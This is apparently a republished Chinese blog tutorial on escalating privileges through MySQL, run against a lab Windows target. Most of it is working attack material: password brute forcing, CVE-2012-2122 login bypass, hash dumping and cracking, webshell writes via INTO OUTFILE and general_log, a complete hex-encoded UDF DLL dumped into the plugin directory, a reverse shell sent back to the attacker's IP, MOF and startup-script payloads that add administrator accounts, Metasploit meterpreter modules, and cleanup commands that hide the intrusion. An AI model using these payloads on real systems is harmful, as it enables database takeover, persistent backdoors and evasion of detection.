实验环境:
攻击机:kali 192.168.43.129
靶机:windows7 PHP+MYSQL 192.168.43.130
权限获取
数据库操作权限
在进行数据库提权之前需要获得数据库的操作权限,从而再进一步getshell,然后提权。
获得数据库操作权限的方法大致有一下几种:
mysql 3306 端口对外开放,可通过弱口令进行爆
root:rootroot:(space)mysql:mysql......c
2. phpmyadmin弱口令登陆
获取phpmyadmin版本信息在网址根路径 后面添加readme.phpREADMEchangelog.phpChangeDocumetation.htmlDocumetation.txttranslators.html
若网站存在sql注入,则可以通过sqlmap的--sql-shell参数来获得数据库操作权限
sqlmap -u “http://192.168.43.130/sqli-labs/Less-1/?id=1" –sql-shell
通过读取网站配置文件拿到数据库账号密码
关键字:config conn data sql inc database等
CVE-2012-2122(https://www.cnblogs.com/zhuxr/p/9553541.html) 等这类漏洞直接拿下 MySQL 权限
MySQL 历史上的漏洞
yaSSL 缓冲区溢出
MySQL yaSSL SSL Hello Message Buffer Overflow 这个缓冲区溢出漏洞 2008 年开始被曝出来,距离现在已经十几年的历史了,所以国光这里没有找到对应的环境测试,不过 MSF 里面已经集成好了对应的模块了:
msf6 > use exploit/windows/mysql/mysql_yassl_hellomsf6 > use exploit/linux/mysql/mysql_yassl_hello
有条件的朋友可以搭建这个漏洞对应的靶场环境
Linux : MySQL 5.0.45-Debian_1ubuntu3.1-log
Windows : MySQL 5.0.45-community-nt
CVE-2012-2122
知道用户名多次输入错误的密码会有几率可以直接成功登陆进数据库,可以循环 1000 次登陆数据库:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done
MSF 里面也有对应的脚本模块可以直接使用,成功后会直接 DUMP 出 MySQL 的 Hash 值:
msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdumpmsf6 > set rhosts 127.0.0.1msf6 > run
Hash 获取与解密
假设存在 SQL 注入 DBA 权限,如果目标 3306 端口也是可以访问通的话,可以尝试读取 MySQL 的 Hash 来解密:
MySQL <= 5.6 版本
select host, user, password from mysql.user;
MySQL >= 5.7 版本select host,user,authentication_string from mysql.user;
得到hash后可以使用hashcat来进行破解
hashcat -a 0 -m 300 --force '8232A1298A49F710DBEE0B330C42EEC825D4190A' usr/share/wordlists/rockyou.txt -O
Hashcat的使用手册总结(https://xz.aliyun.com/t/4008#toc-0)
得到mysql数据库账号密码后可以登录phpmyadmin或者直接连接mysql进行进一步的利用
GETSHELL
1、into oufile 写 shell
直接通过写入文件来getshell,需要满足以下条件
知道网站绝对路径
没有运行在
secure-file-priv
模式下对
Web
目录有读写权限高权限数据库用户
获取绝对路径的方法
1.phpinfo()2.出错页面3.load_file读取网站配置文件 如index.php etc/passwd4.查看数据库表内容获取 有一些cms会保存网站配置文件 或者路径5.进入后台6.百度出错信息 zoomeye shadon 搜索error warning7. @@datadir参数看mysql路径 反猜绝对路径
还可以查询select @@datadir
参数得到mysql路径从而猜测得到网站路径
这里一般猜测网站路径为
C:\phpStudy\PHPTutorial\www
C:\phpStudy\PHPTutorial\WWW
C:\phpStudy\PHPTutorial\html
C:\phpStudy\PHPTutorial\wwwroot
……….
查看mysql安全设置
show global variables like '%secure_file_priv%';
secure_file_priv 可以设置三个参数:空,NULL,filepath
参数说明:
空值:设置为空时,没有进行安全配置,那么这模式下应该就可以导出 webshell
NULL:设置本参数值时,数据库不能进行导入导出
filepath:filepath 是导入导出的文件路径,设置这个值,那么只能导出文件到 filepath 的路径。
这里需要满足 secure_file_priv
为空或者为 web
路径才可以进行读写操作,如果不为空可在 mysql.ini
配置文件中加上 secure_file_priv =
即可
满足以上条件便可使用sql语句来写shell
直接在漏洞点使用联合查询写入:
?id=1' union select 1,'<?php phpinfo();?>',3 into outfile 'C:/phpStudy/PHPTutorial/WWW/cyz.php'--+
使用sqlmap写shell
sqlmap -u "http://192.168.43.130/sqli-labs/Less-1/?id=1" --file-write="cyz.php" --file-dest="C:/phpStudy/PHPTutorial/WWW/sqlmap_cyz.php"
cyz.php为本地文件使用sqlmap的--os-shell写入shell
2、phpmyadmin使用日志写入shell
使用账号密码登录后,除了使用上面的SQL语句来写入shell外,还可以使用其他方法来getshell如phpmyadmin中的文件包含漏洞、命令执行漏洞等来getshell
使用 log 写入 Shell
满足条件:
数据库为 root 权限
Web 目录可写
知道 Web 的物理绝对路径
首先开启 mysql 的日志记录模式
首先查看一下日志的配置:
show variables like '%general%';
打开日志记录
set global general_log='on';
然后改变日志的路径
set global general_log_file='C:\\phpStudy\\PHPTutorial\\WWW\\mysql_shell.php';
之后随便执行一段php代码然后访问mysql_shell.php即可getshell
SELECT "<?php phpinfo();?>";
3、PHPMyAdmin 包含数据库文件 getshell
首先查询数据库文件的存储地址:
show global variables like "%datadir%";
其中的.frm 即为我们的数据库文件
在 mysql_shell 库中新建个 mysql_shell 表,然后字段写上我们的一句话马
可以看到一句话木马已经写入.frm文件
之后使用PHPMyAdmin4.8.x 版本的文件包含漏洞即可进行利用
/index.php?target=db_sql.php%3f/../../../../../../../../../../../../../../C:/phpStudy/PHPTutorial/MySQL/data/test/mysql_shell.frm
由于没有该版本,就没有接着复现了
4、其他phpmyadmin版本的漏洞
phpmyadmin命令执行漏洞:
CVE-2016-5734(http://cyzcc.vip/2020/08/12/CVE-2016-5734/#more)PHPMyaAdmin 本地 SESSION 包含 getshell:
CVE-2018-12613(http://cyzcc.vip/2020/08/13/CVE-2018-12613/#more)
UDF提权
UDF 简介:https://www.cnblogs.com/ghc666/p/8609067.html
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。
手动提权
1、动态链接库
动态链接库文件:是一种不可执行的二进制程序文件,它允许程序共享执行特殊任务所必需的代码和其他资源。Windows提供的DLL文件中包含了允许基于Windows的程序在Windows环境下操作的许多函数和资源。一般被存放在C:视窗系统System目录下。Windows中,DLL多数情况下是带有DLL扩展名的文件,但也可能是EXE或其他扩展名;Debian系统中常常是.so的文件。它们向运行于Windows操作系统下的程序提供代码、数据或函数。程序可根据DLL文件中的指令打开、启用、查询、禁用和关闭驱动程序。
动态链接库位置
sqlmap 的 UDF 动态链接库文件位置
sqlmap根目录/data/udf/mysql
在 sqlmap 中 自带这些动态链接库为了防止被误杀都经过编码处理过,不能被直接使用。不过可以利用 sqlmap 自带的解码工具cloak.py 来解码使用,cloak.py 的位置为:sqlmap根目录/extra/cloak/cloak.py ,解码方法如下:
# 查看当前目录情况➜ pwd/usr/share/sqlmap/extra/cloak# 解码 32 位的 Linux 动态链接库➜ python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so# 解码 64 位的 Linux 动态链接库➜ python3 cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so# 解码 32 位的 Windows 动态链接库➜ python3 cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll# 解码 64 位的 Windows 动态链接库➜ python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll# 查看当前目录下的情况➜ lsREADME.txt cloak.py lib_mysqludf_sys_32.so lib_mysqludf_sys_64.so__init__.py lib_mysqludf_sys_32.dll lib_mysqludf_sys_64.dll
Metasploit 的 UDF 动态链接库文件位置
MSF 根目录/embedded/framework/data/exploits/mysql或者MSF 根目录/data/exploits/mysql
Metasploit 自带的动态链接库文件无需解码,可以直接使用
xxd lib_mysqludf_sys_64.so
一般使用动态链接库里的以下几个函数:
sys_eval - executes an arbitrary command, and returns it’s output.
sys_exec - executes an arbitrary command, and returns it’s exit code.
sys_get - gets the value of an environment variable.
sys_set - create an environment variable, or update the value of an existing environment variable.
2、寻找插件目录
接下来的任务是把 UDF 的动态链接库文件放到 MySQL 的插件目录下,这个目录改如何去寻找呢?可以使用如下的 SQL 语句来查询:
show variables like '%plugin%';
如果不存在可以在 webshell 中找到 MySQL 的安装目录然后手工创建 \lib\plugin
文件夹:
mysql > select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';
mysql安装路径可通过select @@datadir来查看
3、写入动态链接库
SQL 注入且是高权限,plugin 目录可写且需要 secure_file_priv 无限制,MySQL 插件目录可以被 MySQL 用户写入,这个时候就可以直接使用 sqlmap 来上传动态链接库,又因为 GET 有字节长度限制,所以往往 POST 注入才可以执行这种攻击
sqlmap -u "http://127.0.0.1/sqli-labs/Less-1/?id=1" --data="id=1" --file-write="/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll" --file-dest="C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll"
如果没有注入的话,我们可以操作原生 SQL 语句,这种情况下当 secure_file_priv 无限制的时候,我们也是可以手工写文件到 plugin 目录下的:
# 直接 SELECT 查询十六进制写入SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';# 解码十六进制再写入多此一举SELECT unhex('7f454c4602...') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
国光师傅这里已经写好了MySQL UDF 提权十六进制查询(https://www.sqlsec.com/tools/udf.html)
SELECT 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000004d477bd0092615830926158309261583005e86830b261583005e808308261583005e968307261583005e91830b2615832ee06e830a2615830926148325261583005e9c8308261583005e878308261583005e8483082615835269636809261583000000000000000000000000000000000000000000000000504500004c0103004afe9f5a0000000000000000e00002210b010900001000000010000000600000607c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007c83000008020000b4820000c800000000800000b402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e393100555058210d090208b92bcf11b11ceea24f550000560c000000220000260000a8ffffffff8b4c240833c03901741656578b7c24146a0c59be000010dcf3a566a55fb0015e5dfb77fbc38b44240c1a6a071611108bf8183218ff63db6f1ca45fc7011e1200210883380175128b40040df6776f0700750a1004c6000132c0c3530abf1df68d3c3053a454082d08ff30ff15fff6ee776c885985c075085614c601011bc8568d71018a11fd6fdffe4184d275f98b54142bce890a32558bec8b4d0c833902b7d860bf5374148b7d10915c5453eb4cbf9dbddf8b417d740f1b707c1bebe5836004dbb1ffb7001a0c8b48048b008d4401025072a0594c08dfc8d7b5891678113006a44ceb6c57beb7b2b85f5e5da30421740833dbb63ff6a8591353568b742410d878534602db85db5bb6460851c78d5c4257e8240b75eeeebfe01400c604070008ff70041e0553b1db1b921a22c418535720030054090f09b7086a995b0f98599954cf2d343713b8f4540b1edeb60d818403552251519d35dffed6fedf576800f762d66a018945fc068bf08b4560dd7ff70cc606004533ff595939387471683cc071c6fedfda9c12260c3bc7745b506a04ff75fc149073e1edd7a9fd48533afc8d48911040b963dbff2bc18bd88d043b505630f8268c5330d8ad8dbd5f03fe570e940de57df8463fe6364c2066ba5b1810a4803e0059169eb0ff741a8bc6c64437ff00594d1489c906987bebd86f183e5f205ec9c3eed7b235dcbaf37d574708c45030087bdbdacdc9c26a4078c710548d4601b9e07e614251724f0856ff31cf6bafdd9db694c66aff8dc32082f63a58b0b6030d092c23005f7cc36e57036c6a081d1290ac0aa88365fc2f6c2f2c2d4592d0eb071b408f65e8c70bbfd66e42feff000d1fedc25e3bffdb17b60d08209a02f3c3e90806f58bff56688000002d8c6d675880985608845aa3bde0febb062358045485f675054daa83260076fbb7db4508c36f08ed09acc704240607ff0b4c113637598d71ffcf9c0bbf77dfc9750e39056b107e3cff7310830b01fbeec6bb8b0910548b098f57890a23480f85d47d618cbbad641718068b79040838071b76edeebb1e50eb184aa705b8e61768b0b030d8e803a83c0957c1d6bbaeb5d6a1e7e9e2573ca12f4c6a6ff777c3025efd096a1fee76eb3caa10c80475ed7befc0c7051f281a70e027071bdff79d5cb520bc04b81b6a5635b952eb782b7339b2e3696ff7defd7340393d155c741c68062809ac43db6b85850d9e1034252316ffe666f862f154b201dc0801592cc2b1a1db78049ddfdbf62413d90fd4fc83f80266b16f6cb0d2595bffa0584b77783bb5783106350f8487c71996ee4cd3543bf81810897d82efc796be35fac87251833f8af36a7c398587b4f10774e9ffc8d60f7c89c5db9bb5d955f85615441b474ded5be38ef88a394d1003d00874b48909437aa36d020c1ad3f8eba71c3162cc5a64442e386161fb0a58064c32fc19503f1bdf720443375bc9c20cc710fb02231fb2288b2ef28b5d081cae0fdb9b54e433c95cfc7d2008016c2dc6c23bf15a393a4417e4d61bfe7fafae3bf0740583fe02752e1910d03bc1e7166eb8ed57565fd03b5ee40003937b703b67115a039614168012376c7d270a8227fea0246420575062b30d661327002f527f8df61ad2061153f76a037543b067bb614f34032168742e2c0d2c3cec257feb1b71ec5a09706a7c6faae05051597c64825d900eadf62ffa8a19066b8f91b6c72ae490c396ec1640e134a9ff3b246abb41c1f17926547dbc550c0d381e33bc05bc595d382281ec2832f7869f365f212043211c895e2118891d05f78ec243143c21a2aa210c668c186c5ffbda3806252c0620080605dd2dcdd20425002d7ffc9c8f7ab6b1f6143095562407042831d6fedb7f0807348b85e0fca0aa701ddbb5b395011c1920241318092b18476a565f201cb360c32c9f7b8985d8320a04dc03b557e01b243468dedfd1f7d8d360ce2879d40a2c833d208dbdc3da00f923685b1b300bdfaf67f534c97f23401ec25f6a4849918f144a50152e9df458aaf8a29c10f3eb67611c7e052c37d4598feded8321b9273551e0f5ee3bdc0abf03e4507f4b8417185bdb7e600bce1cdc142cd6e288b154b609e01b14f413160a4bdb313ddcdbffdc84676cc859d94e1e07f7d81bf076bbb7c00359485d1656b8bc18be04a3638b6f2af83bc673080753025073d85f60835a3bfe72f15f5e25206c6053c820cc006f35b4dd452bb84d5a346627040b85bf2b5e6e413c03c1813850e45fefa5ecfffb33d2b90b011c48180f94c28bc25dc33fb702bf35e34831c80fb74114ae057106c1a55b6c33578c081817761bffff2ff1d7487bf972098b580803d93bfb720a4283c0283bd67270ca36b5e86ae55dc38f6afef0cd71f7a970040b056418005083ec080db7c670082f316c33c576f0852f06df64a31a89b90968555db7f081f0b2091c6b04f555972dd12c937d1350195c083b04e1c26f2724c1e81ff715e0018fefb6532b034f230059948be55dc3621ddb49a301ca3dafc0fae99525242631ccff29343232b61058054c50ac2cb41e97af12b60d56096b27d7616b20cfb0fbef2ae4e03160031f73d9665b9a6c038d2be0fafc046ba039f13cb4fc8a0d6c120c7d0dc395c3c1619c965154147fe41f3e783124f020140bdac40e5643b25d53ec1068f885626df4f888c9bf4ee640bb25eea0398466820d85c33149db9f0a359a04eb605675f869639fc1f6448b7598751f1033f0071476e6ca20189d271cb4f6ee6fedf4330c113bf77507be4f59eb0b85f30a7b047ea10ac1e0100bf0ce00f7d6076c840d1e045e5f01c33f5c05646464646064686c1405766474b000003ff4c20e034b0f20185f4e6f20ffffb7ff617267756d656e7473096c6c6f77656420287564663a206c69625f6dccfd6df77973716c0d5f73085f696e666f293918dfb6ff8f2076657273696f6e20302e01341f45787065f6dbdbdd637447657861076c79201a65207374723f5bdb5afb672074791b75726171217258c00e602b7477911fd86f030b3f8672206e616d48dbb1b71f436f756c246e6f74c4636113203058b76d186d2779af72f1483fda4d943f2003121071051bf29d5860214707d0604d0d0b0f81cb074ed961dd9703ab17cc2708a77527ecc00fd81f0a3b034fc0a07b851f03240328c1556583a200c5889251ca22d877bdb119bf44ff000f5565a3aa00a8aa9251645455c95532aaaafff61d455c0410020157616974466f00fc06c07253886c654f626a07c07f6b99145669727475616c417603e0f6370d536574456e76126f6ec000bc6dbf5661726961622b4118437265f76deb6e94546806640d47264375727222cd12f65b502a636573734914266e03e083135469636bde6e6bb1f6b6fd5175657279500366846d616e371667ef1b00fd0144697367374cfdb7eded6962727879436192731a4973446562756767edee6dad266a686546a4556e6840b1b7b7b7643164457846707469af46696c4a6d295b6119b41254de64aeb0176d0dd8114990b9edd61a0a6b409d6d70876547c25a73cd517f77555122b4ed6e591b5c537973186deec3c2eb2e39417373650975697cdb15da434c7d5f687e396d5f2edffedebe5f616d7367087869740b646a753a5f666469ec4217b076260a639a5f64fd6cadb91f5f686f6f6b131459725ff802700148d15fdb9ceb0249730a330a6c21d6f0bd82539c2a64d46e640893050b130f651e6b5b7bc25f2c723456ed6d1c182ff6d69a700a035f706f522947e1ddbe6e106468756c5eb92a6bcb92bd9b1b2ca806e0b6d86e6ec57265250866112e827bdb5673749c637079082439edcd5c6b32c06e4d0fd7ed1f5ac36f7319663a1f5f4370705831c75e3b8474bc6d343f001817ffffffff3d193c1c1b161e55142d16270815270f11115f10130a070d2e17090705160c1e7ffbffff080a0b160918181505061b050c10060717062105110f061421110b08e4fbdfb62b22052a111d0d18532d483806000776fbdbe5080c09330a090b0c051007061612eedffeed0e0b34150b18160d3d0542c205121e14066930ffd8ddff110c0e1d4d0517230d0c3224080b4506f0de041004f03b0a6eff2c01043808041c1c0204003e4c016dff21fd05004afe9f5a8fe00002210b0109080c634f7ad60c1213d616a300200e10c10a01630b02ab3362b7ee6107006003040233351eeed9c0ce34100706c02633d6eddb7620ac22033c144002b0021c5759dd0050520143c8c8ba65b1214200a7b82f06db5d182eb4787407ea0b900c5bfa90cdb742602e72647d610861c90e76c508fb0a00c700a1db66bb77402e26300304301becdb943d001a27c04f73726300eb11c0061b40731c4f78c2c2a365761f01030002ed7760497b27421ba023030000edd8d152127c53030400000000000080ff00000000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d871702000080207f8060287f585054505357ffd558618d4424806a0039c475fa83ec80e9ad98ffff0000004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030001010220010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c467265650000006672656500000000000000004afe9f5a0000000058840000010000001200000012000000a4830000ec8300003484000021100000a312000000100000a4120000a3120000a0120000cc110000a31200009811000086110000a31200009811000076100000a3120000431000002e1100001a110000a91000006d84000083840000a0840000bb840000c7840000da840000eb840000f484000004850000128500001b8500002b8500003985000041850000508500005d850000658500007485000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e69740000000000700000100000006d3c683e6c3e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 INTO DUMPFILE 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll';
执行上面的语句即可写入
4、创建自定义函数并调用命令
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
在上传64位的.dll后执行上面的命令会报错ERROR 1126 (HY000): Can't open shared library 'udf.dll' (errno: 193 )
原因是phpstudy自带的版本为32位的,所以需要上传32位的.dll文件
mysql> select * from mysql.func;+----------+-----+---------+----------+| name | ret | dl | type |+----------+-----+---------+----------+| sys_eval | 0 | udf.dll | function |+----------+-----+---------+----------+1 row in set (0.00 sec)
这里的 sys_eval 支持自定义,接着就可以通过创建的这个函数来执行系统命令了:
select sys_eval('whoami');
5、删除自定义函数
drop function sys_eval;
网页脚本提权
UDF.PHP
t00ls UDF.PHP 简单方便,一键 DUMP UDF 和函数,操作门槛降低了很多
上传该php脚本到网站目录即可
linux和windows中udf提权区别
Linux 下的提权条件:
UDF 提权需要数据库在 root 权限在才可以进行提权
而且在 mysql 库下必须有 func 表,并且在‑‑skip‑grant‑tables 开启的情况下,UDF 会被禁止
linux中上传.so文件
Windows 下提权的条件:
如果
mysql
版本大于 5.1,lib_mysqludf_sys64.dll
文件必须放置在plugin
文件夹下如果
mysql
版本小于 5.1,lib_mysqludf_sys64.dll
文件在Windows Server 2003
下放置于c:\windows\system32
目录,在Windows Server 2000
下放置在c:\winnt\system32
目录中
可以通过 INTO DUMPFILE
写入,但一般会有 secure_file_priv
的限制,还不如直接用 webshell
传到 plugin
目录下
需要注意mysql和操作系统的位数
反弹窗口提权
实际上这是 UDF 提权的另一种用法,只是这里的动态链接库被定制过的,功能更多更实用一些:
cmdshell # 执行cmddownloader # 下载者,到网上下载指定文件并保存到指定目录open3389 # 通用开3389终端服务,可指定端口(不改端口无需重启)backshell # 反弹ShellProcessView # 枚举系统进程KillProcess # 终止指定进程regread # 读注册表regwrite # 写注册表shut # 关机,注销,重启about # 说明与帮助函数
动态链接库地址:蓝奏云:langouster_udf.zip
操作方法与前面的udf差不多
首先使用nc监听7777端口
然后上传.dll文件
之后执行
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';select backshell("192.168.43.129", 7777);
成功反弹shell
MOF 提权(只用于 Windows)
MOF 概念与提权原理:
mof 是 windows 系统的一个文件(在 c:/windows/system32/wbem/mof/nullevt.mof)叫做” 托管对象格式” 其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了 mysql 的 root 权限了以后,然后使用 root 权限去执行我们上传的 mof。隔了一定时间以后这个 mof 就会被执行,这个 mof 当中有一段是 vbs 脚本,这个 vbs 大多数的是 cmd 的添加管理员用户的命令。
手动提权
利用条件:
Windows 03
及以下版本mysql
启动身份具有权限去读写c:/windows/system32/wbem/mof
目录secure-file-priv
参数不为NULL
这里附上可用的 MOF
文件:
#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user cyzcc 666666 add\")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};
将这段代码 INTO DUMPFILE
到 c:/windows/system32/wbem/mof/nullevt.mof
中
此时会每隔五秒生成一个 cyzcc
的用户,密码为 `666666
MSF MOF提权
MSF 里面也自带了 MOF 提权模块,使用起来也比较方便而且也做到了自动清理痕迹的效果,实际操作起来效率也还不错:
use exploit/windows/mysql/mysql_mofset payload windows/meterpreter/reverse_tcpset rhosts 192.168.43.130set username rootset password rootrun
由于目标不是win2003以下的系统,所以就没有接着复现了
痕迹清理
因为每隔几分钟时间又会重新执行添加用户的命令,所以想要清理痕迹得先暂时关闭 winmgmt 服务再删除相关 mof 文件,这个时候再删除用户才会有效果:
# 停止 winmgmt 服务net stop winmgmt# 删除 Repository 文件夹rmdir s q C:\Windows\system32\wbem\Repository\# 手动删除 mof 文件del C:\Windows\system32\wbem\mof\good\test.mof F S# 删除创建的用户net user hacker delete# 重新启动服务net start winmgmt
启动项提权
这种提权也常见于 Windows 环境下,当 Windows 的启动项可以被 MySQL 写入的时候可以使用 MySQL 将自定义脚本导入到启动项中,这个脚本会在用户登录、开机、关机的时候自动运行。
手工复现
启动项路径
Windows Server 2003 的启动项路径:
# 中文系统C:\Documents and Settings\Administrator\「开始」菜单\程序\启动C:\Documents and Settings\All Users\「开始」菜单\程序\启动# 英文系统C:\Documents and Settings\Administrator\Start Menu\Programs\StartupC:\Documents and Settings\All Users\Start Menu\Programs\Startup# 开关机项 需要自己建立对应文件夹C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\StartupC:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown
Windows Server 2008 的启动项路径:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
满足条件:
mysql
为root
权限secure_file_priv
为空已知道root密码
create database udfs;use udfs;create table udf (cmd text);insert into udf values ("set wshshell=createobject (""wscript.shell"") " );insert into udf values ("a=wshshell.run (""cmd.exe /c net user cyzcc 666666 /add"",0) " );insert into udf values ("b=wshshell.run (""cmd.exe /c net localgroup administrators root /add"",0) " );select * from udf into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\udf.vbs";
写入成功之后只需要等待用户重新登录即可执行我们的脚本
MSF 启动项提权
没错,MSF 也封装好了对应的模块,目标系统为 Windows 的情况下可以直接使用该模块来上线 MSF,使用起来也很简单:
use exploit/windows/mysql/mysql_start_upset rhosts 192.168.43.130set username rootset password rootrun
之后监听4444端口
handler -H 192.168.43.129 -P 4444 -p windows/meterpreter/reverse_tcp
文件成功写入目标机器
当目标机器重启后即可得到会话
参考连接:
https://www.sqlsec.com/2020/11/mysql.html#toc-heading-34
https://a2u13.com/2020/03/06/Mysql%E7%9A%84getshell%E4%B8%8E%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/
作者:CyzCc,点击下方阅读原文,转至cyzcc师傅博客。
关注公众号:HACK之道
